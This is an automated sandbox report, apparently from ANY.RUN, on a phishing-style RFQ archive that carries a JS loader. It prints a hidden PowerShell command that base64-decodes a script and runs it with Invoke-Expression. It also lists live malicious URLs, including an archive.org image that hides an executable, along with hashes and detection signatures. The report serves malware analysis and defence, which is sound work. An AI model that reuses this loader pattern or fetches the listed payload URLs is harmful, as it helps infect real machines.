URL: https://jurnalpitung.or.id/RFQ25_0311_SPM_09390.7z

Full analysis: https://app.any.run/tasks/bbc9e927-c73d-44f4-a7b0-44a278c3374c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 03, 2025, 10:21:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
loader
reverseloader
payload
possible-phishing
Indicators:
MD5: 99C00CFBB15011D33281BD547DE00FCA
SHA1: 1D14058DBA58882B2B2E4B0887D9512E70CD5990
SHA256: 263313E20BEFCDB2FCBE8CD5324C788CCEEC8B2CF0BEB888B8301E71C55916A9
SSDEEP: 3:N8AkcBsIXQ68r1o6VcWRf:2WB3Xv8r1ojWRf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • wscript.exe (PID: 1128)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 1128)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1128)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7388)
    • REVERSELOADER has been detected (SURICATA)

      • powershell.exe (PID: 7388)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7388)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7388)
  • SUSPICIOUS

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 1128)
    • The process executes JS scripts

      • WinRAR.exe (PID: 3132)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 1128)
    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 1128)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3132)
    • Script creates XML DOM node (SCRIPT)

      • wscript.exe (PID: 1128)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 1128)
    • Executed via WMI

      • powershell.exe (PID: 7388)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7388)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7388)
    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2276)
    • Query current time using 'w32tm.exe'

      • chrome.exe (PID: 7540)
  • INFO

    • Application launched itself

      • chrome.exe (PID: 7540)
    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 3132)
    • Launching a file from the Downloads directory

      • chrome.exe (PID: 7540)
    • Disables trace logs

      • powershell.exe (PID: 7388)
    • Checks proxy server information

      • powershell.exe (PID: 7388)
    • Checks supported languages

      • AddInProcess32.exe (PID: 7200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 164
Monitored processes: 18
Malicious processes: 3
Suspicious processes: 1


Process information

PID
CMD
Path
Indicators
Parent process
PID: 1128
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3132.44719\RFQ25_0311_SPM_09390.js"
Path: C:\Windows\System32\wscript.exe
Parent process: WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1632
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=4736,i,9595648181136327499,4719213237767607668,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4768 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 2012
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=4844,i,9595648181136327499,4719213237767607668,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2920 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 2276
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2924
CMD: "C:\Windows\SysWOW64\w32tm.exe"
Path: C:\Windows\SysWOW64\w32tm.exe
Parent process: chrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Time Service Diagnostic Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 3132
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\RFQ25_0311_SPM_09390.7z"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: chrome.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 7200
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
PID: 7324
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=4604,i,9595648181136327499,4719213237767607668,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4600 /prefetch:8
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
PID: 7328
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7388
CMD: powershell -NoProfile -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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'))| Invoke-Expression"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 7 258
Read events: 7 248
Write events: 10
Delete events: 0

Modification events

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Downloads\RFQ25_0311_SPM_09390.7z

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (3132) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation: write
Name: JSFile
Value:

(PID) Process: (1128) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: C56A160000000000
Executable files: 0
Suspicious files: 23
Text files: 22
Unknown types: 0

Dropped files

PID | Process | Filename
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old~RF1621a6.TMP
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF1621b5.TMP
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RF1621b5.TMP
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF1621b5.TMP
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF1621c5.TMP
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
7540 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 35
DNS requests: 30
Threats: 14

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
7812 | chrome.exe | GET | 200 | 142.250.185.238:80 | http://clients2.google.com/time/1/current?cup2key=8:V1bRO95Dzf7zoHuhVz3ytXLsCP9Uq7Mk7J2viVnQyVo&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | US | text | 107 b | whitelisted
412 | svchost.exe | GET | 200 | 23.55.110.211:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted
7388 | powershell.exe | GET | 200 | 207.241.227.121:80 | http://ia601401.us.archive.org/34/items/msi-pro-with-b-64_20251031/MSI_PRO_with_b64.png | US | image | 2.84 Mb | whitelisted
1376 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | DE | binary | 471 b | whitelisted
5240 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.3.crl | NL | binary | 813 b | whitelisted
5240 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.3.crl | NL | binary | 401 b | whitelisted
5240 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl | NL | binary | 814 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
412 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | | | | whitelisted
2392 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5596 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
| | 2.16.241.200:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
7812 | chrome.exe | 142.250.185.238:80 | clients2.google.com | GOOGLE | US | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
7812 | chrome.exe | 142.250.185.170:443 | safebrowsingohttpgateway.googleapis.com | GOOGLE | US | whitelisted
7812 | chrome.exe | 203.175.9.141:443 | jurnalpitung.or.id | CV. Rumahweb Indonesia | ID | unknown
7812 | chrome.exe | 74.125.206.84:443 | accounts.google.com | GOOGLE | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
  • 51.104.136.2
whitelisted
google.com
  • 216.58.206.46
whitelisted
www.bing.com
  • 2.16.241.200
  • 2.16.241.203
  • 2.16.241.221
  • 2.16.241.222
  • 2.16.241.225
  • 2.16.241.201
  • 2.16.241.204
  • 2.16.241.196
  • 2.16.241.197
whitelisted
clients2.google.com
  • 142.250.185.238
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 142.250.185.170
  • 142.250.186.138
  • 142.250.184.234
  • 142.250.186.170
  • 142.250.186.74
  • 142.250.185.234
  • 216.58.206.74
  • 142.250.184.202
  • 142.251.140.170
  • 216.58.206.42
  • 172.217.18.10
  • 142.250.185.202
  • 142.250.186.42
  • 142.250.186.106
  • 142.250.181.234
  • 142.250.74.202
whitelisted
jurnalpitung.or.id
  • 203.175.9.141
unknown
accounts.google.com
  • 74.125.206.84
whitelisted
sb-ssl.google.com
  • 142.250.185.206
whitelisted
www.google.com
  • 142.250.186.36
whitelisted
safebrowsing.google.com
  • 142.250.186.142
whitelisted

Threats

PID | Process | Class | Message
| | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7388 | powershell.exe | A Network Trojan was detected | ET HUNTING Request To Image Hosted on Archive .org With Minimal Request Headers
7388 | powershell.exe | A Network Trojan was detected | ET MALWARE Request To Malicious Image Hosted on Archive .org
7388 | powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
7388 | powershell.exe | A Network Trojan was detected | ET ATTACK_RESPONSE ReverseLoader Base64 Encoded Executable In Image M2
7388 | powershell.exe | Misc activity | ET INFO Observed Cloudflare R2 Public Bucket (r2 .dev) Domain in TLS SNI
2276 | svchost.exe | Possible Social Engineering Attempted | SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
7388 | powershell.exe | A Network Trojan was detected | ET ATTACK_RESPONSE ReverseLoader Base64 Encoded Executable In Image M1
2276 | svchost.exe | Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] Suspected Malicious Domain (pub-4c182737706e41d29aee6cc5517f834d .r2 .dev)
2276 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
No debug info